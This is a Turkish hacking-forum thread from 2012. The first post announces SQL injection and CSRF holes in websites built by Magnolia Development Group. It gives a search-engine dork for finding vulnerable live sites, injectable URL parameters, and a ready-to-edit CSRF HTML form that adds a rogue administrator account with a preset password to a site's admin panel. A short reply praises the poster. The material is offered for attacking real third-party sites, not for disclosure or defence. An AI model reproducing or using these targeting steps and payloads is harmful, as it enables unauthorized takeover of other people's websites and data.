Tahribat.com Forumları
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Magnolia Development Group Multiple Sql-İnjection / CSRF Açıkları

Yazar cicosz (1) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Magnolia Development Group Multiple Sql-İnjection / CSRF Açıkları

1. 07/May/12 17:37 Kısayol Şikayet Özel Mesaj
   Muhalif Yorumcu
   SeRDaR
   
   Banlanmış Üye
   

   Kayıt Tarihi: 09/Kasım/2003
   

   Magnolia Development Group un tasarımını yaptığı sitelerde  sql injection ve CSRF açıkları var
   
   sitelere her tasarladıkları sitenin altına ekledikleri yazıyı aratarak bulabilirsiniz
   
   

   intext:"site by magnolia development group"  

   Sql injection açıkları 

         # http://[localhost]/project_detail.php?id='1
         # http://[localhost]/project_detail.php?id=[SQLi]
         
         # http://[localhost]/gallery_detail.php?id='1
         # http://[localhost]/gallery_detail.php?id=[SQLi]
         
         # http://[localhost]/*.php?*='1
         # http://[localhost]/*.php?*=[SQLi]
   
   birde CSRF olarak Yeni admin ekleme açığı aşağıdaki kodları isteğe göre düzenlenebilir.
   
   admin girişleri  siteadı.com/admin  vs vs 
   
   

   <html>
   
    <script language="javascript">
   function Publish()
   {
       document.formlist.action.value="publish";
   	document.formlist.submit();
   }
   function Unpublish()
   {
       document.formlist.action.value="unpublish";
   	document.formlist.submit();
   }
   function Delete()
   {
       document.formlist.action.value="delete";
   	document.formlist.submit();
   }
   </script>
   </head>
    <form action="http://site.com/admin/user_act.php" method="post" name="formdetail" id="formdetail">
   <input type="hidden" name="user_id" value="" />
   <input type="hidden" name="action" value="addnew" />
   <table border="0" align="center" cellpadding="3" cellspacing="0">
                       
   <input name="user_name" type="text" id="user_name" value="admin"/>   
   <input name="user_pwd" type="text" id="user_pwd" value="123456"/>
   <input name="user_email" type="text" id="user_email" value="admin@admin"/>
   <input type="submit" name="Submit" value="SAVE"/>
   <html>  

   ---

   Emekçiler ekmeklerini, emeklerinin karşılığı olarak ve önlenemez tarihi sürecin sonucu olarak mutlaka kazanacaklardır. Şüphesiz bu, zorlu bir dönemdir kısa vadeli ve göreceli yenilgilerden geçer.
   Alıntı yap
2. 07/May/12 17:44 Kısayol Şikayet Özel Mesaj
   cicosz
   
   

   Kayıt Tarihi: 22/Ağustos/2005
   

   serdarım yine moddasın eline sağlık :)

    

   Alıntı yap

Cevapla